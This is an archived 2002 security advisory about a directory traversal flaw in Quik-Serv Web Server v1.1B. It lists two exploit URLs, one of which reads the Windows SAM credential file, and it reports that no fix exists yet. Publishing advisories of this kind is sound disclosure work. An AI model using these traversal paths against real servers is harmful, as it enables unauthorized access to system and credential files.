4th Apr 2002 [SBWID-5242]
COMMAND
Quik-Serv Web Server arbitrary file disclosure
SYSTEMS AFFECTED
Quik-Serv Web Server v1.1B
PROBLEM
p0p t4rtz of NetCra$h Security Research Team
[http://www26.brinkster.com/netcrash/] posted :
The server is vulnerable to a directory transversal which allows a
remote user to display arbitrary files.
Exploits :
========
http://server/../../../winnt/repair/sam
http://server/../../../winnt/win.ini
SOLUTION
None yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
